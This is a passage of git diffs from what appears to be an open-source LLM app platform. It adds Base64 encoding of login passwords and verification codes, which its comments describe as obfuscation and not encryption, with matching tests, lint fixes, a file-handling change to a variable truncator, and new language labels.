NotSetupError, UnauthorizedAndForceLogo P = ParamSpec("P") R = TypeVar("R") +# Field names for decryption +FIELD_NAME_PASSWORD = "password" +FIELD_NAME_CODE = "code" + +# Error messages for decryption failures +ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data" +ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code" + def account_initialization_required(view: Callable[P, R]): @wraps(view) @@ -419,3 +429,75 @@ def annotation_import_concurrency_limit(view: Callable[P, R]): return view(*args, **kwargs) return decorated + + +def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None: + """ + Helper to decode a Base64 encoded field in the request payload. + + Args: + field_name: Name of the field to decode + error_class: Exception class to raise on decoding failure + error_message: Error message to include in the exception + """ + if not request or not request.is_json: + return + # Get the payload dict - it's cached and mutable + payload = request.get_json() + if not payload or field_name not in payload: + return + encoded_value = payload[field_name] + decoded_value = FieldEncryption.decrypt_field(encoded_value) + + # If decoding failed, raise error immediately + if decoded_value is None: + raise error_class(error_message) + + # Update payload dict in-place with decoded value + # Since payload is a mutable dict and get_json() returns the cached reference, + # modifying it will affect all subsequent accesses including console_ns.payload + payload[field_name] = decoded_value + + +def decrypt_password_field(view: Callable[P, R]): + """ + Decorator to decrypt password field in request payload. + + Automatically decrypts the 'password' field if encryption is enabled. + If decryption fails, raises AuthenticationFailedError. + + Usage: + @decrypt_password_field + def post(self): + args = LoginPayload.model_validate(console_ns.payload) + # args.password is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA) + return view(*args, **kwargs) + + return decorated + + +def decrypt_code_field(view: Callable[P, R]): + """ + Decorator to decrypt verification code field in request payload. + + Automatically decrypts the 'code' field if encryption is enabled. + If decryption fails, raises EmailCodeError. + + Usage: + @decrypt_code_field + def post(self): + args = EmailCodeLoginPayload.model_validate(console_ns.payload) + # args.code is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE) + return view(*args, **kwargs) + + return decorated diff --git a/api/libs/encryption.py b/api/libs/encryption.py new file mode 100644 index 0000000000..81be8cce97 --- /dev/null +++ b/api/libs/encryption.py @@ -0,0 +1,66 @@ +""" +Field Encoding/Decoding Utilities + +Provides Base64 decoding for sensitive fields (password, verification code) +received from the frontend. + +Note: This uses Base64 encoding for obfuscation, not cryptographic encryption. +Real security relies on HTTPS for transport layer encryption. +""" + +import base64 +import logging + +logger = logging.getLogger(__name__) + + +class FieldEncryption: + """Handle decoding of sensitive fields during transmission""" + + @classmethod + def decrypt_field(cls, encoded_text: str) -> str | None: + """ + Decode Base64 encoded field from frontend. + + Args: + encoded_text: Base64 encoded text from frontend + + Returns: + Decoded plaintext, or None if decoding fails + """ + try: + # Decode base64 + decoded_bytes = base64.b64decode(encoded_text) + decoded_text = decoded_bytes.decode("utf-8") + logger.debug("Field decoding successful") + return decoded_text + + except Exception: + # Decoding failed - return None to trigger error in caller + return None + + @classmethod + def decrypt_password(cls, encrypted_password: str) -> str | None: + """ + Decrypt password field + + Args: + encrypted_password: Encrypted password from frontend + + Returns: + Decrypted password or None if decryption fails + """ + return cls.decrypt_field(encrypted_password) + + @classmethod + def decrypt_verification_code(cls, encrypted_code: str) -> str | None: + """ + Decrypt verification code field + + Args: + encrypted_code: Encrypted code from frontend + + Returns: + Decrypted code or None if decryption fails + """ + return cls.decrypt_field(encrypted_code) diff --git a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py index b6697ac5d4..eb21920117 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py +++ b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py @@ -1,5 +1,6 @@ """Test authentication security to prevent user enumeration.""" +import base64 from unittest.mock import MagicMock, patch import pytest @@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError from controllers.console.auth.login import LoginApi +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestAuthenticationSecurity: """Test authentication endpoints for security against user enumeration.""" @@ -42,7 +48,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -72,7 +80,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "existing@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -104,7 +114,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() diff --git a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py index a44f518171..9929a71120 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py +++ b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py @@ -8,6 +8,7 @@ This module tests the email code login mechanism including: - Workspace creation for new users """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -25,6 +26,11 @@ from controllers.console.error import ( from services.errors.account import AccountRegisterError +def encode_code(code: str) -> str: + """Helper to encode verification code as Base64 for testing.""" + return base64.b64encode(code.encode("utf-8")).decode() + + class TestEmailCodeLoginSendEmailApi: """Test cases for sending email verification codes.""" @@ -290,7 +296,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "valid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"}, ): api = EmailCodeLoginApi() response = api.post() @@ -339,7 +345,12 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"}, + json={ + "email": "newuser@example.com", + "code": encode_code("123456"), + "token": "valid_token", + "language": "en-US", + }, ): api = EmailCodeLoginApi() response = api.post() @@ -365,7 +376,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "invalid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidTokenError): @@ -388,7 +399,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "different@example.com", "code": "123456", "token": "token"}, + json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidEmailError): @@ -411,7 +422,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "wrong_code", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("wrong_code"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(EmailCodeError): @@ -497,7 +508,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -539,7 +550,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(NotAllowedCreateWorkspace): diff --git a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py index 8799d6484d..3a2cf7bad7 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py +++ b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py @@ -8,6 +8,7 @@ This module tests the core authentication endpoints including: - Account status validation """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -28,6 +29,11 @@ from controllers.console.error import ( from services.errors.account import AccountLoginError, AccountPasswordError +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestLoginApi: """Test cases for the LoginApi endpoint.""" @@ -106,7 +112,9 @@ class TestLoginApi: # Act with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", + method="POST", + json={"email": "test@example.com", "password": encode_password("ValidPass123!")}, ): login_api = LoginApi() response = login_api.post() @@ -158,7 +166,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "test@example.com", "password": "ValidPass123!", "invite_token": "valid_token"}, + json={ + "email": "test@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "valid_token", + }, ): login_api = LoginApi() response = login_api.post() @@ -186,7 +198,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "password"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(EmailPasswordLoginLimitError): @@ -209,7 +221,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "frozen@example.com", "password": "password"} + "/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(AccountInFreezeError): @@ -246,7 +258,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")} ): login_api = LoginApi() with pytest.raises(AuthenticationFailedError): @@ -277,7 +289,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(AccountBannedError): @@ -322,7 +334,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -349,7 +361,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"}, + json={ + "email": "different@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "token", + }, ): login_api = LoginApi() with pytest.raises(InvalidEmailError): diff --git a/api/tests/unit_tests/libs/test_encryption.py b/api/tests/unit_tests/libs/test_encryption.py new file mode 100644 index 0000000000..bf013c4bae --- /dev/null +++ b/api/tests/unit_tests/libs/test_encryption.py @@ -0,0 +1,150 @@ +""" +Unit tests for field encoding/decoding utilities. + +These tests verify Base64 encoding/decoding functionality and +proper error handling and fallback behavior. +""" + +import base64 + +from libs.encryption import FieldEncryption + + +class TestDecodeField: + """Test cases for field decoding functionality.""" + + def test_decode_valid_base64(self): + """Test decoding a valid Base64 encoded string.""" + plaintext = "password123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_non_base64_returns_none(self): + """Test that non-base64 input returns None.""" + non_base64 = "plain-password-!@#" + result = FieldEncryption.decrypt_field(non_base64) + # Should return None (decoding failed) + assert result is None + + def test_decode_unicode_text(self): + """Test decoding Base64 encoded Unicode text.""" + plaintext = "密码Test123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_empty_string(self): + """Test decoding an empty string returns empty string.""" + result = FieldEncryption.decrypt_field("") + # Empty string base64 decodes to empty string + assert result == "" + + def test_decode_special_characters(self): + """Test decoding with special characters.""" + plaintext = "P@ssw0rd!#$%^&*()" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + +class TestDecodePassword: + """Test cases for password decoding.""" + + def test_decode_password_base64(self): + """Test decoding a Base64 encoded password.""" + password = "SecureP@ssw0rd!" + encoded = base64.b64encode(password.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_password(encoded) + assert result == password + + def test_decode_password_invalid_returns_none(self): + """Test that invalid base64 passwords return None.""" + invalid = "PlainPassword!@#" + result = FieldEncryption.decrypt_password(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestDecodeVerificationCode: + """Test cases for verification code decoding.""" + + def test_decode_code_base64(self): + """Test decoding a Base64 encoded verification code.""" + code = "789012" + encoded = base64.b64encode(code.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_verification_code(encoded) + assert result == code + + def test_decode_code_invalid_returns_none(self): + """Test that invalid base64 codes return None.""" + invalid = "123456" # Plain 6-digit code, not base64 + result = FieldEncryption.decrypt_verification_code(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestRoundTripEncodingDecoding: + """ + Integration tests for complete encoding-decoding cycle. + These tests simulate the full frontend-to-backend flow using Base64. + """ + + def test_roundtrip_password(self): + """Test encoding and decoding a password.""" + original_password = "SecureP@ssw0rd!" + + # Simulate frontend encoding (Base64) + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_verification_code(self): + """Test encoding and decoding a verification code.""" + original_code = "123456" + + # Simulate frontend encoding + encoded = base64.b64encode(original_code.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_verification_code(encoded) + + assert decoded == original_code + + def test_roundtrip_unicode_password(self): + """Test encoding and decoding password with Unicode characters.""" + original_password = "密码Test123!@#" + + # Frontend encoding + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_long_password(self): + """Test encoding and decoding a long password.""" + original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_with_whitespace(self): + """Test encoding and decoding with whitespace.""" + original_password = "pass word with spaces" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_field(encoded) + + assert decoded == original_password diff --git a/docker/.env.example b/docker/.env.example index 3317fb3d9c..94b9d180b0 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -1460,4 +1460,4 @@ ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 ANNOTATION_IMPORT_MAX_CONCURRENT=5 # The API key of amplitude -AMPLITUDE_API_KEY= +AMPLITUDE_API_KEY= \ No newline at end of file diff --git a/web/app/signin/check-code/page.tsx b/web/app/signin/check-code/page.tsx index 4af2bdd1cc..36c3c67a58 100644 --- a/web/app/signin/check-code/page.tsx +++ b/web/app/signin/check-code/page.tsx @@ -12,6 +12,7 @@ import { emailLoginWithCode, sendEMailLoginCode } from '@/service/common' import I18NContext from '@/context/i18n' import { resolvePostLoginRedirect } from '../utils/post-login-redirect' import { trackEvent } from '@/app/components/base/amplitude' +import { encryptVerificationCode } from '@/utils/encryption' export default function CheckCode() { const { t, i18n } = useTranslation() @@ -43,7 +44,7 @@ export default function CheckCode() { return } setIsLoading(true) - const ret = await emailLoginWithCode({ email, code, token, language }) + const ret = await emailLoginWithCode({ email, code: encryptVerificationCode(code), token, language }) if (ret.result === 'success') { // Track login success event trackEvent('user_login_success', { diff --git a/web/app/signin/components/mail-and-password-auth.tsx b/web/app/signin/components/mail-and-password-auth.tsx index ba37087719..27c37e3e26 100644 --- a/web/app/signin/components/mail-and-password-auth.tsx +++ b/web/app/signin/components/mail-and-password-auth.tsx @@ -13,6 +13,7 @@ import { noop } from 'lodash-es' import { resolvePostLoginRedirect } from '../utils/post-login-redirect' import type { ResponseError } from '@/service/fetch' import { trackEvent } from '@/app/components/base/amplitude' +import { encryptPassword } from '@/utils/encryption' type MailAndPasswordAuthProps = { isInvite: boolean @@ -53,7 +54,7 @@ export default function MailAndPasswordAuth({ isInvite, isEmailSetup, allowRegis setIsLoading(true) const loginData: Record = { email, - password, + password: encryptPassword(password), language: locale, remember_me: true, } diff --git a/web/docker/entrypoint.sh b/web/docker/entrypoint.sh index 565c906624..7e1aca680b 100755 --- a/web/docker/entrypoint.sh +++ b/web/docker/entrypoint.sh @@ -42,4 +42,5 @@ export NEXT_PUBLIC_LOOP_NODE_MAX_COUNT=${LOOP_NODE_MAX_COUNT} export NEXT_PUBLIC_MAX_PARALLEL_LIMIT=${MAX_PARALLEL_LIMIT} export NEXT_PUBLIC_MAX_ITERATIONS_NUM=${MAX_ITERATIONS_NUM} export NEXT_PUBLIC_MAX_TREE_DEPTH=${MAX_TREE_DEPTH} + pm2 start /app/web/server.js --name dify-web --cwd /app/web -i ${PM2_INSTANCES} --no-daemon diff --git a/web/package.json b/web/package.json index a3a4391d1e..c5dbf0a07d 100644 --- a/web/package.json +++ b/web/package.json @@ -288,4 +288,4 @@ "sharp" ] } -} +} \ No newline at end of file diff --git a/web/utils/encryption.ts b/web/utils/encryption.ts new file mode 100644 index 0000000000..f96d8d02ac --- /dev/null +++ b/web/utils/encryption.ts @@ -0,0 +1,46 @@ +/** + * Field Encoding Utilities + * Provides Base64 encoding for sensitive fields (password, verification code) + * during transmission from frontend to backend. + * + * Note: This uses Base64 encoding for obfuscation, not cryptographic encryption. + * Real security relies on HTTPS for transport layer encryption. + */ + +/** + * Encode sensitive field using Base64 + * @param plaintext - The plain text to encode + * @returns Base64 encoded text + */ +export function encryptField(plaintext: string): string { + try { + // Base64 encode the plaintext + // btoa works with ASCII, so we need to handle UTF-8 properly + const utf8Bytes = new TextEncoder().encode(plaintext) + const base64 = btoa(String.fromCharCode(...utf8Bytes)) + return base64 + } + catch (error) { + console.error('Field encoding failed:', error) + // If encoding fails, throw error to prevent sending plaintext + throw new Error('Encoding failed. Please check your input.') + } +} + +/** + * Encrypt password field for login + * @param password - Plain password + * @returns Encrypted password or original if encryption disabled + */ +export function encryptPassword(password: string): string { + return encryptField(password) +} + +/** + * Encrypt verification code for email code login + * @param code - Plain verification code + * @returns Encrypted code or original if encryption disabled + */ +export function encryptVerificationCode(code: string): string { + return encryptField(code) +} From c2f2be6b086f0a15eab8961fcddc53cb353d10a5 Mon Sep 17 00:00:00 2001 From: Angel98518 Date: Tue, 16 Dec 2025 18:00:04 +0800 Subject: [PATCH 58/68] fix: oxlint no unused expressions (#29675) Co-authored-by: daniel --- web/app/components/billing/plan-upgrade-modal/index.tsx | 5 ++++- web/app/components/plugins/install-plugin/utils.ts | 3 ++- .../components/editor/code-editor/editor-support-vars.tsx | 3 ++- .../nodes/_base/components/support-var-input/index.tsx | 3 ++- web/app/components/workflow/nodes/code/code-parser.ts | 2 +- .../components/workflow/nodes/http/components/curl-panel.tsx | 3 ++- web/app/components/workflow/nodes/trigger-webhook/types.ts | 3 ++- web/app/components/workflow/utils/node.ts | 2 +- 8 files changed, 16 insertions(+), 8 deletions(-) diff --git a/web/app/components/billing/plan-upgrade-modal/index.tsx b/web/app/components/billing/plan-upgrade-modal/index.tsx index 4f5d1ed3a6..f7e19b7621 100644 --- a/web/app/components/billing/plan-upgrade-modal/index.tsx +++ b/web/app/components/billing/plan-upgrade-modal/index.tsx @@ -33,7 +33,10 @@ const PlanUpgradeModal: FC = ({ const handleUpgrade = useCallback(() => { onClose() - onUpgrade ? onUpgrade() : setShowPricingModal() + if (onUpgrade) + onUpgrade() + else + setShowPricingModal() }, [onClose, onUpgrade, setShowPricingModal]) return ( diff --git a/web/app/components/plugins/install-plugin/utils.ts b/web/app/components/plugins/install-plugin/utils.ts index afbe0f18af..32d3e54225 100644 --- a/web/app/components/plugins/install-plugin/utils.ts +++ b/web/app/components/plugins/install-plugin/utils.ts @@ -61,7 +61,8 @@ export const pluginManifestInMarketToPluginProps = (pluginManifest: PluginManife } export const parseGitHubUrl = (url: string): GitHubUrlInfo => { - const match = url.match(/^https:\/\/github\.com\/([^/]+)\/([^/]+)\/?$/) + const githubUrlRegex = /^https:\/\/github\.com\/([^/]+)\/([^/]+)\/?$/ + const match = githubUrlRegex.exec(url) return match ? { isValid: true, owner: match[1], repo: match[2] } : { isValid: false } } diff --git a/web/app/components/workflow/nodes/_base/components/editor/code-editor/editor-support-vars.tsx b/web/app/components/workflow/nodes/_base/components/editor/code-editor/editor-support-vars.tsx index abc7d8dbc4..68b6e53064 100644 --- a/web/app/components/workflow/nodes/_base/components/editor/code-editor/editor-support-vars.tsx +++ b/web/app/components/workflow/nodes/_base/components/editor/code-editor/editor-support-vars.tsx @@ -84,7 +84,8 @@ const CodeEditor: FC = ({ const getUniqVarName = (varName: string) => { if (varList.find(v => v.variable === varName)) { - const match = varName.match(/_(\d+)$/) + const varNameRegex = /_(\d+)$/ + const match = varNameRegex.exec(varName) const index = (() => { if (match) diff --git a/web/app/components/workflow/nodes/_base/components/support-var-input/index.tsx b/web/app/components/workflow/nodes/_base/components/support-var-input/index.tsx index 3be1262e14..47d80c109f 100644 --- a/web/app/components/workflow/nodes/_base/components/support-var-input/index.tsx +++ b/web/app/components/workflow/nodes/_base/components/support-var-input/index.tsx @@ -25,7 +25,8 @@ const SupportVarInput: FC = ({ const renderSafeContent = (inputValue: string) => { const parts = inputValue.split(/(\{\{[^}]+\}\}|\n)/g) return parts.map((part, index) => { - const variableMatch = part.match(/^\{\{([^}]+)\}\}$/) + const variableRegex = /^\{\{([^}]+)\}\}$/ + const variableMatch = variableRegex.exec(part) if (variableMatch) { return ( { [CodeLanguage.python3]: /def\s+main\s*\((.*?)\)/, [CodeLanguage.javascript]: /function\s+main\s*\((.*?)\)/, } - const match = code.match(patterns[language]) + const match = patterns[language].exec(code) const params: string[] = [] if (match?.[1]) { diff --git a/web/app/components/workflow/nodes/http/components/curl-panel.tsx b/web/app/components/workflow/nodes/http/components/curl-panel.tsx index a5339a1f39..4b9ee56f85 100644 --- a/web/app/components/workflow/nodes/http/components/curl-panel.tsx +++ b/web/app/components/workflow/nodes/http/components/curl-panel.tsx @@ -75,7 +75,8 @@ const parseCurl = (curlCommand: string): { node: HttpNodeType | null; error: str // To support command like `curl -F "file=@/path/to/file;type=application/zip"` // the `;type=application/zip` should translate to `Content-Type: application/zip` - const typeMatch = value.match(/^(.+?);type=(.+)$/) + const typeRegex = /^(.+?);type=(.+)$/ + const typeMatch = typeRegex.exec(value) if (typeMatch) { const [, actualValue, mimeType] = typeMatch value = actualValue diff --git a/web/app/components/workflow/nodes/trigger-webhook/types.ts b/web/app/components/workflow/nodes/trigger-webhook/types.ts index d9632f20e1..90cfd40434 100644 --- a/web/app/components/workflow/nodes/trigger-webhook/types.ts +++ b/web/app/components/workflow/nodes/trigger-webhook/types.ts @@ -5,7 +5,8 @@ export type HttpMethod = 'GET' | 'POST' | 'PUT' | 'DELETE' | 'PATCH' | 'HEAD' export type ArrayElementType = 'string' | 'number' | 'boolean' | 'object' export const getArrayElementType = (arrayType: `array[${ArrayElementType}]`): ArrayElementType => { - const match = arrayType.match(/^array\[(.+)\]$/) + const arrayRegex = /^array\[(.+)\]$/ + const match = arrayRegex.exec(arrayType) return (match?.[1] as ArrayElementType) || 'string' } diff --git a/web/app/components/workflow/utils/node.ts b/web/app/components/workflow/utils/node.ts index 726908bff1..97ca7553e8 100644 --- a/web/app/components/workflow/utils/node.ts +++ b/web/app/components/workflow/utils/node.ts @@ -105,7 +105,7 @@ export function getLoopStartNode(loopId: string): Node { export const genNewNodeTitleFromOld = (oldTitle: string) => { const regex = /^(.+?)\s*\((\d+)\)\s*$/ - const match = oldTitle.match(regex) + const match = regex.exec(oldTitle) if (match) { const title = match[1] From dda7eb03c90ae60ee39aa49c961f46f57a63de8f Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Wed, 17 Dec 2025 07:10:43 +0800 Subject: [PATCH 59/68] feat: _truncate_json_primitives support file (#29760) --- api/services/variable_truncator.py | 8 ++- .../services/test_variable_truncator.py | 49 +++++++++++++++++++ 2 files changed, 56 insertions(+), 1 deletion(-) diff --git a/api/services/variable_truncator.py b/api/services/variable_truncator.py index 6eb8d0031d..0f969207cf 100644 --- a/api/services/variable_truncator.py +++ b/api/services/variable_truncator.py @@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator): @overload def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ... + @overload + def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ... + def _truncate_json_primitives( self, - val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None, + val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None, target_size: int, ) -> _PartResult[Any]: """Truncate a value within an object to fit within budget.""" @@ -425,6 +428,9 @@ class VariableTruncator(BaseTruncator): return self._truncate_array(val, target_size) elif isinstance(val, dict): return self._truncate_object(val, target_size) + elif isinstance(val, File): + # File objects should not be truncated, return as-is + return _PartResult(val, self.calculate_json_size(val), False) elif val is None or isinstance(val, (bool, int, float)): return _PartResult(val, self.calculate_json_size(val), False) else: diff --git a/api/tests/unit_tests/services/test_variable_truncator.py b/api/tests/unit_tests/services/test_variable_truncator.py index cf6fb25c1c..ec819ae57a 100644 --- a/api/tests/unit_tests/services/test_variable_truncator.py +++ b/api/tests/unit_tests/services/test_variable_truncator.py @@ -518,6 +518,55 @@ class TestEdgeCases: assert isinstance(result.result, StringSegment) +class TestTruncateJsonPrimitives: + """Test _truncate_json_primitives method with different data types.""" + + @pytest.fixture + def truncator(self): + return VariableTruncator() + + def test_truncate_json_primitives_file_type(self, truncator, file): + """Test that File objects are handled correctly in _truncate_json_primitives.""" + # Test File object is returned as-is without truncation + result = truncator._truncate_json_primitives(file, 1000) + + assert result.value == file + assert result.truncated is False + # Size should be calculated correctly + expected_size = VariableTruncator.calculate_json_size(file) + assert result.value_size == expected_size + + def test_truncate_json_primitives_file_type_small_budget(self, truncator, file): + """Test that File objects are returned as-is even with small budget.""" + # Even with a small size budget, File objects should not be truncated + result = truncator._truncate_json_primitives(file, 10) + + assert result.value == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_array(self, truncator, file): + """Test File objects in arrays are handled correctly.""" + array_with_files = [file, file] + result = truncator._truncate_json_primitives(array_with_files, 1000) + + assert isinstance(result.value, list) + assert len(result.value) == 2 + assert result.value[0] == file + assert result.value[1] == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_object(self, truncator, file): + """Test File objects in objects are handled correctly.""" + obj_with_files = {"file1": file, "file2": file} + result = truncator._truncate_json_primitives(obj_with_files, 1000) + + assert isinstance(result.value, dict) + assert len(result.value) == 2 + assert result.value["file1"] == file + assert result.value["file2"] == file + assert result.truncated is False + + class TestIntegrationScenarios: """Test realistic integration scenarios.""" From 5539bf878809e64b2b1badd23e25644ef4456b09 Mon Sep 17 00:00:00 2001 From: GuanMu Date: Wed, 17 Dec 2025 10:18:10 +0800 Subject: [PATCH 60/68] fix: add Slovenian and Tunisian Arabic translations across multiple language files (#29759) --- web/i18n/ar-TN/common.ts | 2 ++ web/i18n/de-DE/common.ts | 2 ++ web/i18n/en-US/common.ts | 2 ++ web/i18n/es-ES/common.ts | 2 ++ web/i18n/fa-IR/common.ts | 2 ++ web/i18n/fr-FR/common.ts | 2 ++ web/i18n/hi-IN/common.ts | 2 ++ web/i18n/id-ID/common.ts | 2 ++ web/i18n/it-IT/common.ts | 2 ++ web/i18n/ja-JP/common.ts | 2 ++ web/i18n/ko-KR/common.ts | 2 ++ web/i18n/pl-PL/common.ts | 2 ++ web/i18n/pt-BR/common.ts | 2 ++ web/i18n/ro-RO/common.ts | 2 ++ web/i18n/ru-RU/common.ts | 2 ++ web/i18n/sl-SI/common.ts | 2 ++ web/i18n/th-TH/common.ts | 2 ++ web/i18n/tr-TR/common.ts | 2 ++ web/i18n/uk-UA/common.ts | 2 ++ web/i18n/vi-VN/common.ts | 2 ++ web/i18n/zh-Hans/common.ts | 2 ++ web/i18n/zh-Hant/common.ts | 2 ++ web/package.json | 4 ++-- 23 files changed, 46 insertions(+), 2 deletions(-) diff --git a/web/i18n/ar-TN/common.ts b/web/i18n/ar-TN/common.ts index 10788713a4..8437c0643f 100644 --- a/web/i18n/ar-TN/common.ts +++ b/web/i18n/ar-TN/common.ts @@ -113,6 +113,8 @@ const translation = { hiIN: 'الهندية', trTR: 'التركية', faIR: 'الفارسية', + slSI: 'السلوفينية', + arTN: 'العربية التونسية', }, }, unit: { diff --git a/web/i18n/de-DE/common.ts b/web/i18n/de-DE/common.ts index 337406c719..479348ef43 100644 --- a/web/i18n/de-DE/common.ts +++ b/web/i18n/de-DE/common.ts @@ -99,6 +99,8 @@ const translation = { hiIN: 'Hindi', trTR: 'Türkisch', faIR: 'Persisch', + slSI: 'Slowenisch', + arTN: 'Tunesisches Arabisch', }, }, unit: { diff --git a/web/i18n/en-US/common.ts b/web/i18n/en-US/common.ts index 11cc866fde..d78520cf1f 100644 --- a/web/i18n/en-US/common.ts +++ b/web/i18n/en-US/common.ts @@ -113,6 +113,8 @@ const translation = { hiIN: 